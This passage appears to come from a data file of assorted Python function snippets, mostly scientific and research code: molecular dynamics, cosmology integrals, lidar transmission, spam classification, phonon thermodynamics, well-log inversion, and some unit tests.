[\"--clevis=tpm2\"]\n TEST_RUNNER(command_line)", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def test_simple():\n B = 100\n H = 20\n E = 210000\n sections = ((B, H, 0, E),)\n EI, top, bot = bm.EI(sections, E)\n EIc = E * B * (H ** 3) / 12\n assert 0.99 < EI / EIc < 1.01\n assert top == H / 2\n assert bot == -H / 2", "def OxygenTransmission(T,P,n_wv,wavelength,dr,freq_lim=np.array([lp.c/770e-9,lp.c/768e-9]),sim_nu=np.array([]),spec_file=''):\n # fraction of O2 by number density\n fO2 = (32*0.2320+28.02*0.7547+44.01*0.00046+39.94*0.0128+20.18*0.000012+4.0*0.0000007+83.8*0.000003+131.29*0.00004)*0.2320/32.0\n \n if len(spec_file) == 0:\n spec_file = '/Users/mhayman/Documents/DIAL/O2_HITRAN2012_760_781.txt'\n \n if sim_nu.size==0:\n sim_nu = np.arange(-3e9,3e9,20e6)\n \n# inu0 = np.argmin(np.abs(sim_nu)) # index to center of frequency array\n \n n_o2=fO2*(P/(lp.kB*T)-n_wv) # to convert atm to Pa use *101325\n ext_o2 = rb.ExtinctionFromHITRAN(lp.c/wavelength+sim_nu,T,P,(mO2*1e-3)/lp.N_A,nuLim=freq_lim,freqnorm=True,filename=spec_file).T\n T_o2 = np.exp(-np.cumsum(n_o2[np.newaxis,:]*ext_o2,axis=1)*dr)\n \n return T_o2,sim_nu", "def testingPhase(SP, HP):\n classification= {}\n TP, TN, FP, FN = 0,0,0,0\n\n pullData = open(\"labels\", \"r\").read()\n dataArray= pullData.split('\\n')\n dataArrayTest=dataArray[21301:-1] #opens files from folder 070 onwards \n \n for eachLine in dataArrayTest:\n kind,file = eachLine.split(' ')\n print(file,kind)\n if (kind == \"spam\"):\n SO = 1 #initially stating that it is a spam not a ham\n HO = 0\n elif (kind== \"ham\"):\n HO = 1\n SO = 0\n file=file.strip('../') \n fileDir = os.path.dirname(os.path.realpath('__file__'))\n filepath = os.path.join(fileDir,file) \n email=\"\"\n fh = open(filepath, encoding=\"ascii\", errors=\"ignore\")\n for line in fh:\n email += line\n fh.close()\n email= email.lower()\n email_words = processText(contentEmail(email))\n email_words = tuple(email_words)\n spam_ba= math.log(PS,10) #initially contains value of Spam Probability\n ham_ba= math.log(PH, 10) #initially contains value of Ham Probability\n\n\n \"\"\"BAYES THEOREM\"\"\"\n for word, value in SP.items(): \n if word in email_words:\n x = math.log(value, 10)\n spam_ba += x\n else:\n x = math.log(1-value, 10)\n #print(x)\n spam_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n for word,value in HP.items(): \n if word in email_words:\n x = math.log(value, 10)\n #print(x)\n ham_ba += x \n else:\n x = math.log(1-value, 10)\n #print(x)\n ham_ba += x \n if ham_ba > spam_ba:\n label=\"ham\"\n elif ham_ba < spam_ba:\n label=\"spam\"\n\n print(\"Spam Prob: \" ,spam_ba, \"Ham Prob: \" ,ham_ba)\n\n #This part determines if the emails are ham or spam depending on the calculations\n if HO == 1 and label == \"ham\":\n TN +=1\n if HO == 1 and label == \"spam\":\n FP +=1\n if SO == 1 and label == \"spam\":\n TP +=1\n if SO == 1 and label == \"ham\":\n FN +=1\n #print(classification)\n print(TP, TN, FP, FN)\n print(spam_ba)\n print(ham_ba)\n \"\"\"COMPUTES PRECISION AND RECALL\"\"\"\n Precision = TP/(TP+FP)\n Recall = TP/(TP+FN)\n\n print(\"Precision: \", Precision, \" \", \"Recall: \", Recall)", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def TMM(x,N,n,trun_basis):\n Mat = np.zeros([len(trun_basis),len(trun_basis)])\n print('making TMM')\n perms = [int((x**n * iii)%N) for iii in trun_basis] # Modular multiplication\n for iii in range(len(trun_basis)):\n if trun_basis.__contains__(perms[iii]):\n Mat[iii,trun_basis.index(perms[iii])] = 1\n return Mat", "def intf_ENTPGRAM(E):\n # !! Need to check for some eids being TRIs. Filter that out.\n if ( not inc.entid_or_LST_of_entids(E.The,3) or \n not inc.point_formatted_LST(E.The,2) or\n not inc.point_formatted_LST(E.The,1) ):\n print(\"Input Error: pgram\")\n print(intf_ENTPGRAM.__doc__)\n return # Without doing much of anything.\n oB= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n oA= [ xyz.val for xyz in E.The.StackPop().val ] # A list [3.5 -2 0].\n myeids= E.The.StackPop().val\n if type(myeids)==type(list()):\n #myeids= map(lambda x:x.val, myeids) # Should now be a list of ints.\n myeids= [x.val for x in myeids] # Should now be a list of ints.\n else:\n myeids= [ myeids ] # Also a (1 item) list of ints.\n neweidlist= []\n for myeid in myeids:\n if myeid in MMEL.El: # Check if eid exists.\n src_ent= MMEL.El[myeid]\n new_ent= src_ent.duplicate()\n new_ent.translate([ oB[0]-oA[0], oB[1]-oA[1], oB[2]-oA[2] ])\n As= mm.Entity.allplist.PLdict[ src_ent.epts[0] ]\n Ae= mm.Entity.allplist.PLdict[ src_ent.epts[1] ]\n Bs= mm.Entity.allplist.PLdict[ new_ent.epts[0] ]\n Be= mm.Entity.allplist.PLdict[ new_ent.epts[1] ]\n neweidlist.append(new_ent.eid)\n MMEL.add_ent(new_ent)\n line_entS= mm.Line_Entity( [As,Bs] )\n neweidlist.append(line_entS.eid)\n MMEL.add_ent(line_entS)\n line_entE= mm.Line_Entity( [Ae,Be] )\n neweidlist.append(line_entE.eid)\n MMEL.add_ent(line_entE)\n tri_entA= mm.Tri_Entity( [As, Ae, Bs] )\n neweidlist.append(tri_entA.eid)\n MMEL.add_ent(tri_entA)\n tri_entB= mm.Tri_Entity( [Bs, Be, Ae] )\n neweidlist.append(tri_entB.eid)\n MMEL.add_ent(tri_entB)\n else:\n print(\"WARNING: Entity ID# %d does not exist.\" % myeid)\n if neweidlist:\n neweids= objectifier.StackOB_LST( [objectifier.StackOB_VAL(x) for x in neweidlist] )\n E.The.StackPush(neweids)\n OUT.default(MMEL,E) # AUTODUMP ", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def createCNDTransEmiProb(self, qtc_type='qtcc'):\n \n if qtc_type == 'qtcb':\n state_num = 11\n elif qtc_type == 'qtcc':\n state_num = 83\n elif qtc_type == 'qtcbc':\n state_num = 92\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = []\n \n if qtc_type == 'qtcb':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2])\n elif qtc_type == 'qtcc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n elif qtc_type == 'qtcbc':\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n qtc.append([i-2, j-2, np.NaN, np.NaN])\n for i in xrange(1, 4):\n for j in xrange(1, 4):\n for k in xrange(1, 4):\n for l in xrange(1, 4):\n qtc.append([i-2, j-2, k-2, l-2])\n else:\n raise(QtcException(\"createCNDTransEmiProb: Unknow qtc type: {!r}\".format(qtc_type)))\n \n qtc = np.array(qtc)\n #np.savetxt('/home/cdondrup/qtc.csv', qtc, delimiter=',', fmt='%1f')\n \n trans = np.zeros((state_num, state_num))\n for i1 in xrange(qtc.shape[0]):\n for i2 in xrange(i1+1, qtc.shape[0]):\n trans[i1+1, i2+1] = np.nanmax(np.absolute(qtc[i1]-qtc[i2])) != 2\n if trans[i1+1, i2+1] == 1:\n for j1 in xrange(qtc.shape[1]-1):\n for j2 in xrange(j1+1, qtc.shape[1]):\n if sum(np.absolute(qtc[i1, [j1, j2]])) == 1 \\\n and sum(np.absolute(qtc[i2, [j1, j2]])) == 1:\n if np.nanmax(np.absolute(qtc[i1, [j1, j2]]-qtc[i2, [j1, j2]])) > 0 \\\n and sum(qtc[i1, [j1, j2]]-qtc[i2, [j1,j2]]) != 1:\n trans[i1+1, i2+1] = 5\n break\n if trans[i1+1, i2+1] != 1:\n break\n trans[i2+1, i1+1] = trans[i1+1, i2+1]\n \n trans[trans != 1] = 0\n #np.savetxt('/home/cdondrup/trans.csv', np.rint(trans).astype(int), delimiter=',', fmt='%i')\n trans[trans == 0] = 0.00001\n trans[0] = 1\n trans[:, 0] = 0\n trans[:, -1] = 1\n trans[0, -1] = 0\n trans[-1] = 0\n trans += np.dot(np.eye(state_num), 0.00001)\n trans[0, 0] = 0\n \n trans = trans / trans.sum(axis=1).reshape(-1, 1)\n #np.savetxt('/home/cdondrup/trans.csv', trans, delimiter=',')\n \n emi = np.eye(state_num)\n emi[emi == 0] = 0.0001\n \n return trans, emi", "def test_active_inference_SPM_1a(self):\n array_path = os.path.join(os.getcwd(), DATA_PATH + \"vbx_test_1a.mat\")\n mat_contents = loadmat(file_name=array_path)\n\n A = mat_contents[\"A\"][0]\n B = mat_contents[\"B\"][0]\n C = to_arr_of_arr(mat_contents[\"C\"][0][0][:,0])\n obs_matlab = mat_contents[\"obs\"].astype(\"int64\")\n policy = mat_contents[\"policies\"].astype(\"int64\") - 1\n t_horizon = mat_contents[\"t_horizon\"][0, 0].astype(\"int64\")\n actions_matlab = mat_contents[\"actions\"].astype(\"int64\") - 1\n qs_matlab = mat_contents[\"qs\"][0]\n xn_matlab = mat_contents[\"xn\"][0]\n vn_matlab = mat_contents[\"vn\"][0]\n\n likelihoods_matlab = mat_contents[\"likelihoods\"][0]\n\n num_obs, num_states, _, num_factors = get_model_dimensions(A, B)\n obs = convert_observation_array(obs_matlab, num_obs)\n T = len(obs)\n\n agent = Agent(A=A, B=B, C=C, inference_algo=\"MMP\", policy_len=1, \n inference_horizon=t_horizon, use_BMA = False, \n policy_sep_prior = True)\n \n actions_python = np.zeros(T)\n\n for t in range(T):\n o_t = (np.where(obs[t])[0][0],)\n qx, xn_t, vn_t = agent.infer_states_test(o_t)\n q_pi, efe= agent.infer_policies()\n action = agent.sample_action()\n\n actions_python[t] = action\n\n xn_python = build_xn_vn_array(xn_t)\n vn_python = build_xn_vn_array(vn_t)\n\n if t == T-1:\n xn_python = xn_python[:,:,:-1,:]\n vn_python = vn_python[:,:,:-1,:]\n\n start_tstep = max(0, agent.curr_timestep - agent.inference_horizon)\n end_tstep = min(agent.curr_timestep + agent.policy_len, T)\n\n xn_validation = xn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n vn_validation = vn_matlab[0][:,:,start_tstep:end_tstep,t,:]\n\n self.assertTrue(np.isclose(xn_python, xn_validation).all())\n self.assertTrue(np.isclose(vn_python, vn_validation).all())\n \n self.assertTrue(np.isclose(actions_matlab[0,:],actions_python[:-1]).all())", "def ORM1(RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n#\n# 5.1.1 Initialise Outputs & Check for missing values in inputs:\n# --------------------------------------------------------------\n\tPHIt=MissingValue\n\tPHIe=MissingValue\n\tCBW=MissingValue\n\tBVW=MissingValue\n\tHCPV=MissingValue\n\tVf=MissingValue\n\tVs=MissingValue\n\tSwt=MissingValue\n\tSwe=MissingValue\n\tVc1=MissingValue\n\tVc2=MissingValue\n\tVc3=MissingValue\n\tVk=MissingValue\n\tToc=MissingValue\n\tQc=MissingValue\n\tGDen=MissingValue\n\tif MissingValue in (RHOB,PHIN,DTCO,RD,Dw,HIw,DTw,Rw,Df,HIf,DTf,Rf,Da,HIa,DTa,Ra,Dc1,HIc1,DTc1,PHIc1,Rc1,Dc2,HIc2,DTc2,PHIc2,Rc2,Dc3,HIc3,DTc3,PHIc3,Rc3,Ck,Dk,HIk,DTk,PHIk,Rk,RSK,Cwv,Ckv,Alpha,Sxoe):\n\t\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Vs,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen\n#\n# 5.1.2 Initialise parameters:\n# ----------------------------\n#\t5.1.2.1 Initialise Interation Control Paramaeters:\n#\t--------------------------------------------------\n\tNIter=0\n\tNIterMax=100\n\tErrIter=10000\n\tTolErrIter=0.0001\n\tIterEnd=0\n#\n#\t5.1.2.2 Initialise Volumes and Hydrocarbon Properties:\n#\t------------------------------------------------------\n\tVk=0.000 # Volume of kerogen initialised to zero\n\tVa=0.000 # Volume of adsorbed gas initialised to zero\n\tVf=0.000 # Volume of free gas initialised to zero\n#\n#\t5.7.3 Start interative loop:\n#\t-----------------------------\n\twhile IterEnd==0:\n#\n# 5.7.3.1 Compute Pore Fluid Properties:\n# --------------------------------------\n\t\tSum=Va+Vf\n\t\tif(Sum==0):\n\t\t\tDh=Df\n\t\t\tHIh=HIf\n\t\t\tDTh=DTf\n\t\telse:\n\t\t\tDh=(Va*Da+Vf*Df)/Sum\n\t\t\tHIh=(Va*HIa+Vf*HIf)/Sum\n\t\t\tDTh=(Va*DTa+Vf*DTf)/Sum\n\t\tDpf=(Sxoe*Dw)+(1-Sxoe)*Dh # Density of pore fluid\n\t\tHIpf=(Sxoe*HIw)+(1-Sxoe)*HIh # Hydrogen Index of pore fluid\n\t\tDTpf=(Sxoe*DTw)+(1-Sxoe)*DTh # DT of pore fluid\t\n#\n#\t5.7.3.2 Matrix Inversion:\n#\t-------------------------\n\t\tYMatrix = [RHOB,PHIN,DTCO,1] # Populate YMatrix\n\t\tAMatrix = [[Dc1,Dc2,Dk,Dpf],[HIc1,HIc2,HIk,HIpf],[DTc1,DTc2,DTk,DTpf],[1,1,1,1]] # Populate AMatrix\n\t\tXMatrix,Qc=SolveAndCorrect(AMatrix,YMatrix) # Solve for XMatrix\n\t\tVc1=XMatrix[0] # Volume of component 1\n\t\tVc2=XMatrix[1] # Volume of component 2\n\t\tVc3=0.000 # Volume of component 3 (not calculated in this routine).\n\t\tVk=XMatrix[2] # Volume of organic component\n\t\tPHIe=XMatrix[3] # Volume of hydrocarbon in organic and inorganic pores\n#\n#\t5.7.3.3 Determine Total & Effective Water Saturations:\n#\t-----------------------------------------------------\n\t\tPHIm=(Vc1*PHIc1)+(Vc2*PHIc2)+(Vc3*PHIc3) # Compute Micro Porosity\n\t\tPHIt=PHIm+PHIe\n\t\tSwe=fConnectivityModel(RD,Vc1,Vc2,Vc3,Vk,PHIe,Rc1,Rc2,Rc3,Rk,Rw,Rf,Cwv,Ckv,Alpha)\n\t\tif(PHIt==0):\n\t\t\tSwt=1.000\n\t\telse:\n\t\t\tSwt=(PHIm+PHIe*Swe)/PHIt\n#\n#\t5.7.4.3 Compute Volume of Adsorbed and Free Gas:\n#\t------------------------------------------------\n\t\tVa=RSK*Vk # Volume of adsorbed gas in organic pores\n\t\tHCPV=PHIt*(1-Swt)\n\t\tif(Va>=HCPV):\n\t\t\tVa=HCPV\n\t\tVf=HCPV-Va # Volume of free gas\t\n#\n# 5.4.4 Test for interative computations:\n# ---------------------------------------\n\t\tNIter=NIter+1\n\t\tif(NIter>=NIterMax):\n\t\t\tIterEnd=1\n\t\telse:\t\t\t\n\t\t\tif(NIter<=2):\n\t\t\t\tResultOld=[1,1,1,1,1,1,1,1,1] # Initial Setting\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\telse:\n\t\t\t\tResultNew=[Vc1,Vc2,Vc3,Vk,Va,Vf,PHIe,Swt,Swe] # Current Results\n\t\t\t\tErrIter=ComputeMatrixDifference(ResultOld,ResultNew)\n\t\t\t\tResultOld=ResultNew\n\t\t\t\tif(ErrIter<=TolErrIter):\n\t\t\t\t\tIterEnd=1\n#\n# 5.4.6 Preoutput computations:\n# ------------------------------\n\tCBW=PHIm # The assumption is that all microporosity can be considered to be clay bound water.\n\tBVW=PHIe*Swe # Bulk volume of water\n\tHCPV=PHIt*(1-Swt) # Hydrocarbon pore volume\t\n\tToc=fToc_Wtf(Vc1,Vc2,Vc3,Vk,0,Ck,Dc1,Dc2,Dc3,Dk,Dw) # TOC-wt fraction. Note: Vrw=0 in fToc_Wtf(Vc1,Vc2,Vc3,Vk,Vrw,Ck,Dc1,Dc2,Dc3,Dk,Dw) # Total Organic Carbon wt%\n\tGDen=fOrmGDen(Vc1,Vc2,Vc3,Vk,0,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density. Note: Vrw=0 in fOrmGDen(Vc1,Vc2,Vc3,Vk,Vrw,Dc1,Dc2,Dc3,Dk,Dw) # Grain Density g/cm3\n#\n# 5.4.7 Output Results:\n# \t-------------------\n\treturn PHIt,PHIe,CBW,BVW,HCPV,Vf,Va,Swt,Swe,Vc1,Vc2,Vc3,Vk,Toc,Qc,GDen", "def Char_Gate(NV,res ,B_field=400):\n\n\n #data = np.loadtxt(\"NV_Sim_8.dat\") #Placeholder data to test the script\n #NV = np.vstack((data[:,3],data[:,4]))\n #physical constants\n gamma_c = 1.071e3 #g-factor for C13 in Hz/G\n #Model parameters\n omega_larmor = 2*np.pi*gamma_c*B_field\n tau_larmor = 2*np.pi/omega_larmor\n tau = res[0]\n n_pulses = int(res[1]*2) #So that we do a pi -pulse\n\n Ix = 0.5 * np.array([[0,1],[1,0]])\n Iz = 0.5* np.array([[1,0],[0,-1]])\n H0 = (omega_larmor)*Iz\n exH0 =linalg.expm(-1j*H0*tau)\n\n\n M = np.zeros(np.shape(NV)[0])\n for idC in range(np.shape(NV)[0]):\n A= 2*np.pi*NV[idC,0]\n B= 2*np.pi*NV[idC,1] #Converts to radial frequency in Hz/G\n H1 = (A+omega_larmor) *Iz +B*Ix\n exH1 = linalg.expm(-1j*H1*tau)\n V0 = exH0.dot(exH1.dot(exH1.dot(exH0)))\n V1 = exH1.dot(exH0.dot(exH0.dot(exH1)))\n n0 = Calc_axis(V0)\n n1 =Calc_axis(V1)\n phi = np.real(2*np.arccos(np.trace(V0)/2))\n M[idC] = 1 - (1-np.dot(n0,n1))*np.sin(n_pulses * phi /2 )**2\n\n Signal = -M.prod()\n F = (1-(Signal+1)/2)\n return F", "def test_act_iv(self):\n # setup\n self.transaction_behaviour.processing = None\n self.transaction_behaviour.waiting = []\n\n # operation\n self.transaction_behaviour.act()\n\n # after\n self.assert_quantity_in_outbox(0)", "def _r_inv(self):\n raise NotImplementedError", "def test_put_nveto_pmt_item(self):\n pass", "def prove_I0() -> Proof:\n # Task 4.8", "def produce_13TeV_template(tag_name=\"HKHI\"):\n num_rebin = 1\n file_name = \"inputs/BkgEstimation_Lin/BkgEstimation_NONE_TOPO_PTDEP_\"+tag_name+\"_Lin.root\"\n print \"Input: \", file_name\n fin = ROOT.TFile.Open(file_name, \"read\")\n h_nom = fin.Get(\"bkg_total_gg_full\").Clone(\"bkg_nominal_old\")\n h_nom.Rebin(num_rebin)\n fout = ROOT.TFile.Open(\"hists_input_\"+tag_name+\".root\", \"recreate\")\n\n h_purity_sys = fin.Get(\"bkg_purity_syst_gg_full\").Clone(\"bkg_purity_syst_gg\")\n h_reducible_sys = fin.Get(\"bkg_reducible_syst_gg_full\").Clone(\"bkg_reducible_syst_gg\")\n h_irreducible_sys = fin.Get(\"bkg_irreducible_syst_gg_full\").Clone(\"bkg_irreducible_syst_gg\")\n h_iso_sys = fin.Get(\"bkg_iso_syst_gg_full\").Clone(\"bkg_iso_syst_gg\")\n\n #file_iso = \"isolation_sys/hist.root\"\n #fin2 = ROOT.TFile.Open(file_iso, \"read\")\n #h_iso_sys = fin2.Get(\"bkg_isolation_syst_gg\")\n ## inflat irreducible uncertainty by factor of 10\n # so that it closes to stats uncertainty in data\n sf = 1\n if INFLATE_SYS:\n sf = 10\n\n # after rebinning systematic uncertainties, need to scale down,\n # otherwise the uncertainties are inflated.\n h_purity_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_irreducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_reducible_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n h_iso_sys.Rebin(num_rebin).Scale(sf/num_rebin)\n\n ## truncate the histograms to [200, 2000] GeV\n h_nom_new = truncate_hist(h_nom, \"bkg_nominal\")\n h_purity_sys_new = truncate_hist(h_purity_sys, \"h_purity_sys_new\")\n h_irreducible_sys_new = truncate_hist(h_irreducible_sys, \"h_irreducible_sys_new\")\n h_reducible_sys_new = truncate_hist(h_reducible_sys, \"h_reducible_sys_new\")\n h_iso_sys_new = truncate_hist(h_iso_sys, \"h_iso_sys_new\")\n\n #write down sys and nominal\n fout.cd()\n h_nom_new.Write()\n h_purity_sys_new.Write()\n h_reducible_sys_new.Write()\n h_irreducible_sys_new.Write()\n h_iso_sys_new.Write()\n\n h_purity_up, h_purity_down = create_sys_hist(h_nom_new, h_purity_sys_new, \"purity_sys\")\n h_purity_up.Write()\n h_purity_down.Write()\n\n h_red_up, h_red_down = create_sys_hist(h_nom_new, h_reducible_sys_new, \"reducible_sys\")\n h_red_up.Write()\n h_red_down.Write()\n\n h_irred_up, h_irred_down = create_sys_hist(h_nom_new, h_irreducible_sys_new, \"irreducible_sys\")\n h_irred_up.Write()\n h_irred_down.Write()\n\n h_iso_up, h_iso_down = create_sys_hist(h_nom_new, h_iso_sys, \"isolation_sys\")\n h_iso_up.Write()\n h_iso_down.Write()\n\n fin.Close()\n fout.Close()", "def TDErrorFunction(Prof,x,Trx,rb_spec,abs_spec,dr,inu0,bsrMult,base_T,base_P,r0,lam=[0,0,0,0,0,0]):\n \n iR = Prof['WV Online'].size # range index for a profile into 1D x array\n x2 = np.reshape(x,(iR+1,6))\n xK = x2[0,:] # constants [HSRL Mol HSRL Comb, WV On, WV Off, O2 On ,O2 Off]\n xS = x2[1:,:] # state vector [T, nWV, BSR, phi_HSRL, phi_WV, phi_O2]\n \n # HSRLProfile(T,BSR,phi,rb_spec,Trx,inu0,K,base_T,base_P)\n HSRL_mol = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Mol'],inu0['HSRL'],xK[0],base_T,base_P)+Prof['HSRL Mol BG']\n HSRL_comb = HSRLProfile(xS[:,0],xS[:,2],xS[:,3],rb_spec['HSRL'],Trx['HSRL Comb'],inu0['HSRL'],xK[1],base_T,base_P)+Prof['HSRL Comb BG']\n \n# WVDIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n WV_on = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Online'],abs_spec['WV Online'],Trx['WV Online'],inu0['WV Online'],xK[2],base_T,base_P,dr,r0)+Prof['WV Online BG']\n WV_off = WVDIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['WV'],xS[:,4],rb_spec['WV Offline'],abs_spec['WV Offline'],Trx['WV Offline'],inu0['WV Offline'],xK[3],base_T,base_P,dr,r0)+Prof['WV Offline BG']\n\n# O2DIALProfile(T,nWV,BSR,phi,rb_spec,abs_spec,Trx,inu0,K,base_T,base_P,dr)\n O2_on = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Online'],abs_spec['O2 Online'],Trx['O2 Online'],inu0['O2 Online'],xK[4],base_T,base_P,dr,r0)+Prof['O2 Online BG']\n O2_off = O2DIALProfile(xS[:,0],xS[:,1],xS[:,2]+bsrMult['O2'],xS[:,5],rb_spec['O2 Offline'],abs_spec['O2 Offline'],Trx['O2 Offline'],inu0['O2 Offline'],xK[5],base_T,base_P,dr,r0)+Prof['O2 Offline BG']\n \n# # Optimization error. T is piecewise\n# OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n# +np.nansum(HSRL_comb-(Prof['HSRL Comb'])*np.log(HSRL_comb)) \\\n# +np.nansum(WV_on-(Prof['WV Online'])*np.log(WV_on)) \\\n# +np.nansum(WV_off-(Prof['WV Offline'])*np.log(WV_off)) \\\n# +np.nansum(O2_on-(Prof['O2 Online'])*np.log(O2_on)) \\\n# +np.nansum(O2_off-(Prof['O2 Offline'])*np.log(O2_off)) \\\n# +lam[0]*np.nansum(np.abs(np.diff(xS[:,0]))) \\\n# +lam[1]*np.nansum(np.abs(np.diff(xS[:,1]))) \\\n# +lam[2]*np.nansum(np.abs(np.diff(xS[:,2]))) \\\n# +lam[3]*np.nansum(np.abs(np.diff(xS[:,3]))) \\\n# +lam[4]*np.nansum(np.abs(np.diff(xS[:,4]))) \\\n# +lam[5]*np.nansum(np.abs(np.diff(xS[:,5]))) \n \n # Optimization error. T is piecewise slope\n OptError = np.nansum(HSRL_mol-(Prof['HSRL Mol'])*np.log(HSRL_mol)) \\\n 